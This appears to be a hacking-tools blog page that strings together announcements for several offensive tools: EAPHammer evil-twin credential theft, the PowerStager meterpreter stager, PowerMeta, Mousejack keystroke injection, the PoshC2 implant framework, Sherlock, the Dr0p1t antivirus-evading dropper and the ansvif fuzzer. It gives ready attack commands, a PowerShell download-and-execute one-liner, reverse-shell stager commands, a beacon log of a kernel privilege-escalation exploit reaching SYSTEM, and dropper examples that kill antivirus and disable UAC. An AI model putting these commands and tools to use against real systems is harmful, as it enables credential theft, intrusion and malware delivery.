EAPHammer - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks [Indirect Wireless Pivots Using Hostile Portal Attacks]

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to setup and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds

Leverages a lightly modified version of hostapd-wpe, dnsmasq, dsniff, Responder, and Python 2.7.

Features

• Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
• Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
• Perform captive portal attacks
• Built-in Responder integration
• Support for Open networks and WPA-EAP/WPA2-EAP
• No manual configuration necessary for most attacks.
• No manual configuration necessary for installation and setup process

Upcoming Features

• Perform seemeless MITM attacks with partial HSTS bypasses
• Support attacks against WPA-PSK/WPA2-PSK
• Support for SSID cloaking
• Generate timed payloads for indirect wireless pivots
• Integrated PowerShell payload generation
• impacket integration for SMB relay attacks
• directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
• Updated hostapd-wpe that works with the latest version of Hostapd
• Integrated website cloner for cloning captive portal login pages
• Integrated HTTP server

Will this tool ever support Karma attacks?

• At some point yes, but for now the focus has been on directed evil twin attacks.
• If Karma attacks are like a wireless grenade launcher, this tool is more like an easy-to-use wireless sniper rifle

Setup Guide

Kali Setup Instructions
Begin by cloning the eaphammer repo using the following command.

git clone https://github.com/s0lst1c3/eaphammer.git

Next run the kali-setup.py file as shown below to complete the eaphammer setup process. This will install dependencies and compile hostapd.

python setup.py

Other Distros
If you are not using Kali, you can still compile eaphammer. I just haven't written a setup script for your distro yet, which means you'll have to do it manually. Ask yourself whether you understand the following:

• python-devel vs python-dev
• service vs systemctl
• network-manager vs NetworkManager
• httpd vs apache2

If you looked at this list and immediately realized that each pair of items was to some extent equivalent (well, except for service vs systemctl, but you catch my drift), you'll probably have no problems getting this package to work on the distro of your choice. If not, please just stick with Kali until support is added for other distros.
With that out of the way, here are the generic setup instructions:
Use your package manager to install each of the dependencies listed in kali-dependencies.txt. Package names can vary slightly from distro to distro, so you may get a "package not found" error or similar. If this occurs, just use Google to find out what the equivalent package is for your distro and install that instead.
Once you have installed each of the dependencies listed in kali-dependencies.txt, you'll need to install some additional packages that ship with Kali by default. These packages are listed below. If you're on a distro that uses httpd instead of apache2, install that instead.

• dsniff
• apache2

Compile hostapd using the following commands:

cd hostapd-eaphammer
make

Open config.py in the text editor of your choice and edit the following lines so that to values that work for your distro:

# change this to False if you cannot/will not use systemd
use_systemd = True

# change this to 'NetworkManager' if necessary
network_manager = 'network-manager'

# change this 'httpd' if necessary
httpd = 'apache2'

Usage Guide

x.509 Certificate Generation
Eaphammer provides an easy-to-use wizard for generating x.509 certificates. To launch eaphammer's certificate wizard, just use the command shown below.

./eaphammer --cert-wizard

Stealing RADIUS Credentials From EAP Networks
To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the --creds flag as shown below.

./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth ttls --creds

The flags shown above are self explanatory. For more granular control over the attack, you can use the --wpa flag to specify WPA vs WPA2 and the --auth flag to specify the eap type. Note that for cred reaping attacks, you should always specify an auth type manually since the the --auth flag defaults to "open" when omitted.

./eaphammer --bssid 00:11:22:33:44:00 --essid h4x0r --channel 4 --wpa 2 --auth ttls --interface wlan0 --creds

Please refer to the options described in Additional Options section of this document for additional details about these flags.

Stealing AD Credentials Using Hostile Portal Attacks
Eaphammer can perform hostile portal attacks that can force LLMNR/NBT-NS enabled Windows clients into surrendering password hashes. The attack works by forcing associations using an evil twin attack, then forcing associated clients to attempt NetBIOS named resolution using a Redirect To SMB attack. While this occurs, eaphammer runs Responder in the background to perform a nearly instantaneous LLMNR/NBT-NS poisoning attack against the affected wireless clients. The result is an attack that causes affected devices to not only connect to the rogue access point, but send NTLM hashes to the rogue access point as well.
The --hostile-portal flag can be used to execute a hostile portal attack, as shown in the examples below.

./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth peap --wpa 2 --hostile-portal

./eaphammer --interface wlan0 --essid TotallyLegit --channel 1 --auth open --hostile-portal

Performing Indirect Wireless Pivots Using Hostile Portal Attacks
The hostile portal attack described in Stealing AD Credentials Using Hostile Portal Attacks can be used to perform an SMB relay attack against the affected devices. An attacker can use hostile portal attack to perform an SMB relay attack that places timed reverse shell on an authorized wireless devices. The attacker can then disengage the attack to allow the authorized device to reconnect to the targetted network. When the attacker receives the reverse shell, he or she will have the same level of authorization as the attacker.

Performing Captive Portal Attacks
To perform a captive portal attack using eaphammer, use the --captive-portal flag as shown below.

./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 6 --interface wlan0 --captive-portal

This will cause eaphammer to execute an evil twin attack in which the HTTP(S) traffic of all affected wireless clients are redirected to a website you control. Eaphammer will leverage Apache2 to serve web content out of /var/www/html if used with the default Apache2 configuration. Future iterations of eaphammer will provide an integrated HTTP server and website cloner for attacks against captive portal login pages.

Additional Options

• --cert-wizard - Use this flag to create a new RADIUS cert for your AP.
• -h, --help - Display detailed help message and exit.
• -i, --interface - Specify the a PHY interface on which to create your AP.
• -e ESSID, --essid ESSID - Specify access point ESSID.
• -b BSSID, --bssid BSSID - Specify access point BSSID.
• --hw-mode HW-MODE - Specify access point hardware mode (default: g).
• -c CHANNEL, --channel CHANNEL - Specify access point channel.
• --wpa {1,2} - Specify WPA type (default: 2).
• --auth {peap,ttls,open} - Specify auth type (default: open).
• --creds - Harvest EAP creds using an evil twin attack.
• --hostile-portal - Force clients to connect to hostile portal.
• --captive-portal - Force clients to connect to a captive portal.

Download EAPHammer

Read More

PowerStager - A payload stager using PowerShell

This script creates an executable stager that downloads a selected powershell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation.

This enables the actual payload to be executed indirectly without the victim downloading it, only by executing the stager. The attacker can then for example implement evasion techniques on the web server, hosting the payload, instead of in the stager itself.

Additional methods allows the payload to be embedded into the 'stager' and temporarily stored encrypted on disk for memory injection.

Not only are powershell powerful when managing Windows, it's also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more...

How to use
Install it:

git clone https://github.com/z0noxz/powerstager
cd powerstager
sudo ./setup.py install

Generate a meterpreter payload to upload:

powerstager -t win64 -o out.ps1 -m --lhost 13.37.13.37 --lport 4444 --generate
powerstager -t win64 -o out.exe -u <url pointing the the uploaded payload>

Generate an embedded meterpreter payload:

powerstager -t win64 -o out.exe -m --lhost 13.37.13.37 --lport 4444

Generate an embedded custom payload:

powerstager -t win64 -o out.exe -p input.ps1

Download PowerStager

Read More

PowerMeta - PowerShell Script to Search Publicly Files for a Particular Domain and Get the Associated MetaData

PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.

Public File Discovery
For many organizations it's common to find publicly available files posted on their external websites. Many times these files contain sensitive information that might be of benefit to an attacker like usernames, domains, software titles or computer names. PowerMeta searches both Bing and Google for files on a particular domain using search strings like "site:targetdomain.com filetype:pdf". By default it searches for "pdf, docx, xlsx, doc, xls, pptx, and ppt".

Metadata Extraction
PowerMeta uses Exiftool by Phil Harvey to extract metadata information from files. If you would prefer to download the binary from his site directly instead of using the one in this repo it can be found here: http://www.sno.phy.queensu.ca/~phil/exiftool/. Just make sure the exiftool executable is in the same directory as PowerMeta.ps1 when it is run. By default it just extracts the 'Author' and 'Creator' fields as these commonly have usernames saved. However all metadata for files can be extracted by passing PowerMeta the -ExtractAllToCsv flag.

Usage

Basic Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx. Once it has finished crafting this list it will prompt the user asking if they wish to download the files from the target domain. After downloading files it will prompt again for extraction of metadata from those files.

C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com

Changing FileTypes and Automatic Download and Extract
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, or xml. It will then automatically download them from the target domain and extract metadata.

C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -FileTypes "pdf, xml" -Download -Extract

Downloading Files From A List
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx and write the links of files found to disk in a file called "target-domain-links.txt".

C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -TargetFileList target-domain-links.txt

Extract All Metadata and Limit Page Search
This command will initiate Google and Bing searches for files on the 'targetdomain.com' domain ending with a file extension of pdf, docx, xlsx, doc, xls, pptx, or pptx but only search the first two pages. All metadata (not just the default fields) will be saved in a CSV called all-target-metadata.csv.

C:\PS> Invoke-PowerMeta -TargetDomain targetdomain.com -MaxSearchPages 2 -ExtractAllToCsv all-target-metadata.csv

Extract Metadata From Files In A Directory
This command will simply extract all the metadata from all the files in the folder "\2017-03-031-144953" and save it in a CSV called all-target-metadata.csv

C:\PS> ExtractMetadata -OutputDir .\2017-03-031-144953\ -ExtractAllToCsv all-target-metadata.csv

PowerMeta Options

TargetDomain        - The target domain to search for files. 
FileTypes           - A comma seperated list of file extensions to search for. By default PowerMeta searches for "pdf, docx, xlsx, doc, xls, pptx, ppt".
OutputList          - A file to output the list of links discovered through web searching to. 
OutputDir           - A directory to store all downloaded files in.
TargetFileList      - List of file links to download.
Download            - Instead of being prompted interactively pass this flag to auto-download files found.
Extract             - Instead of being prompted interactively pass this flag to extract metadata from found files pass this flag to auto-extract any metadata.
ExtractAllToCsv     - All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
UserAgent           - Change the default User Agent used by PowerMeta.
MaxSearchPages      - The maximum number of pages to search on each search engine.

Download PowerMeta

Read More

Mousejack Transmit - Wireless Mouse/Keyboard Attack With Replay/Transmit PoC

This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

scanner
Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.

usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
  -p PREFIX, --prefix PREFIX          Promiscuous mode address prefix
  -d DWELL, --dwell DWELL             Dwell time per channel, in milliseconds

Scan for devices on channels 1-5

./nrf24-scanner.py -c {1..5}

Scan for devices with an address starting in 0xA9 on all channels

./nrf24-scanner.py -p A9

sniffer
Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file

usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o OUTPUT, --output OUTPUT                 Output file to log the packets
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]

Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log

./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

replay/transmit
Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.

usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o INPUT_FILE, --input INPUT_FILE          Input file that has the packets to sned
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]

Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel

./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

network mapper
Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.

usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Known address
  -p PASSES, --passes PASSES                 Number of passes (default 2)
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]

Map the star network that address 61:49:66:82:03 belongs to

./nrf24-network-mapper.py -a 61:49:66:82:03

continuous tone test
The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.
This script will cause the transceiver to transmit a tone on the first channel that is passed in.

usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)

Transmit a continuous tone at 2405MHz

./nrf24-continuous-tone-test.py -c 5

Packet generator script
This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.

usage: ./keymapper.py 

Log files
The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.
The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo
A demo of exploiting a Windows machine:

Download Mousejack Transmit

Read More

PoshC2 - Powershell C2 Server and Implants

PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework.

Requires only Powershell v2 on both server and client

C2 Server

Implant Handler

Quick Install
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')"

Team Server
Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler

Download PoshC2

Read More

Sherlock - Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities

PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:

• MS10-015 : User Mode to Ring (KiTrap0D)
• MS10-092 : Task Scheduler
• MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
• MS13-081 : TrackPopupMenuEx Win32k NULL Page
• MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
• MS15-051 : ClientCopyImage Win32k
• MS15-078 : Font Driver Buffer Overflow
• MS16-016 : 'mrxdav.sys' WebDAV
• MS16-032 : Secondary Logon Handle

Tested on:

• Windows 7 SP1 32-bit
• Windows 7 SP1 64-bit
• Windows 8 64-bit
• Windows 10 64-bit

Basic Usage:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

Download Sherlock

Read More

Dr0p1t-Framework 1.2 - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

ansvif - An Advanced Fuzzing Framework Designed To Find Vulnerabilities In C/C++ Code.

ansvif, written primarily in C++, is designed to find code bugs by throwing garbage input at programs to see how they react. This is great for finding bugs, because not every type of input is always handled, and buffers are not always checked, etc. It also comes in handy when writing (and protecting against), buffer overflow exploitation, as well as string input validation vulnerabilities (the %s bug).

Dependancies:
automake autoconf-archive zlib1g-dev libcrypto++ g++ gcc

Compliation:
Linux:

$ aclocal && autoconf && automake -a && ./configure && make

Or, if you would like to play with the syscall fuzzer:

$ aclocal && autoconf && automake -a && ./configure --enable-syscalls && make

OpenBSD:

$ AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'`\
aclocal && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'`\
autoconf && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'`\
AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'` automake -a\
&& CXX=eg++ ./configure && make

Windows:
Windows binaries are now desgined to be compiled with MinGW-W64 (since we use threading download a version of MinGW-W64 g++ with seh).

(Go to where you installed MinGW-W64 and click mingw-64.bat)
g++.exe src/common.cpp src/win/bin2hex.cpp src/win/bin2hex_pc.cpp src/win/popen2.cpp src/win/main.cpp src/win/help.cpp src/match_seg.cpp src/win/sys_string.cpp src/win/sys_string_pc.cpp src/win/man_read.cpp src/randomizer.cpp src/trash.cpp -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++
gcc src/win/printf.c -o printf.exe

Note: cygwin .dll external files are no longer required as we now compile with g++ from MinGW. In Windows 7 Powershell v2 is installed by default, however, this program requires atleast Powershell v5. Windows 10 includes powershell v5. You can go to Microsoft's site and download the Windows Management Framework (which includes newer Versions of Powershell here:
https://www.microsoft.com/en-us/download/details.aspx?id=50395

Testing:
If you would like to try out the example code, you can compile faulty.c with:

$ gcc faulty.c -o faulty

Using the example code: You can point the memory back at address \xff\x05\x40\x00\x00\x00\x00\x00 (the subroutine containing the code that spawns bash) with: $ ./faulty -a $(perl -e 'print "A"x24;print "\x00\xff\x05\x40\x00\x00\x00\x00\x00"') The address may be a little different under your distro, check gdb if you really want to try it out. The code above /should/ drop you at a bash prompt. If the code is set to a mode where all are able to execute as another user, it will attempt to spawn a root shell. or simply run make test .

Usage:
Important note: Windows users will have to run ansvif.exe from Powershell for it to work!

$ ./find_suid /usr/bin/ /bin/ /sbin/
$ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize

Examples:
Linux/BSD:

$ echo "Marshall" ./ansvif -t examples/template -c ./faulty -b 64
$ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt\
-f 8 -b 2048
$ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b\
128 -A "file:///home/username/src/ansvif/tmp/tmphtml"  -f 2 -n -R "sleep 3 && killall\
iceweasel" -S ">"
$ cat examples/linux_syscalls_implemented.list | xargs -P \
`cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \
-B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16

Windows:

PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x `
..\..\examples\htmltags -c `
'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' `
-b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" `
-f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome"

Options:

  -t This file should hold line by line command arguments as shown in the example file.
  -e This file should hold line by line environment variables as shown in the example
     file.  You can usually get these by doing something like:
     $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > mount_envs
  -c Specifies the command path.
  -p Specifies the manpage location (as an integer, usually 1 or 8)
  -m Specifies the commands manpage.
  -D Dumps whats found in the manpage.
  -f Number of threads to use.  Default is 2.
  -b Specifies the buffer size to fuzz with.  256-2048 Is usually sufficient.
  -r Uses only random garbage data.
  -o Writes output to log file.
  -z Randomize the buffer size from 1 to what is specified by -b.
  -x Other junk to put in.  Usernames and such can go here.
  -S Seperator between options.
  -s Omitted character specification.  Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory.
  -T Timeout for threads.
  -W Timeout for threads.
  -L Unpriviledged user to run as if root.
  -A Always put whats after this after command to run.
  -B Always put whats after this before the command to run.
  -F File to feed into the program that -x along with normal fuzzing data will be put in.
  -n Never use random data in the fuzz.
  -R Run this command after each fuzz.
  -C A Non standard error code to detect.
  -V Use Valgrind if installed.
  -1 Try to make it fault once, if it doesn't happen, throw error code 64.  Useful for scripting.
  -P Use % to represent binary in fuzz.
  -M Max arguments to use in the fuzz.
  -y Short for -b 0 and usually only useful with -A or -B
  -K Keep fuzzing after a crash in the target.
  -v Verbose.
  -d Debug data.
  -h Shows the help page.

Recommendations: It is recommended that if you are doing long fuzzes or file fuzzing, if possible put the files (including the binary you are fuzzing if possible) in memory. This means, put them somewhere like /var/run/shm where disk thrash will be minimal, and fuzzing will be somewhat faster, especially if large files are being handled. Be warned however: You will lose your fuzzed files if they are in shm and you reboot the machine!

DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT! If you try setting faulty.c's output to suid(0) then PLEASE do it in a virtual machine. or atleast a machine that you don't care about. Other than that, just play around and have fun!

Notes:
Windows users must have ansvif running from Powershell. Linux and Windows code should be relatively stable. Syscall fuzzing under linux is under heavy development.

Download ansvif

Read More

Dr0p1t-Framework - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ? you can read about them from here .
Dr0p1t let you create dropper like any tool but this time FUD with some tricks ;)

Features

• Works with Windows and Linux
• Adding malware after downloading it to startup
• Adding malware after downloading it to task scheduler
• Finding and killing the antivirus before running the malware
• Running a custom (batch|powershell|vbs) file you have choosen before running the malware
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
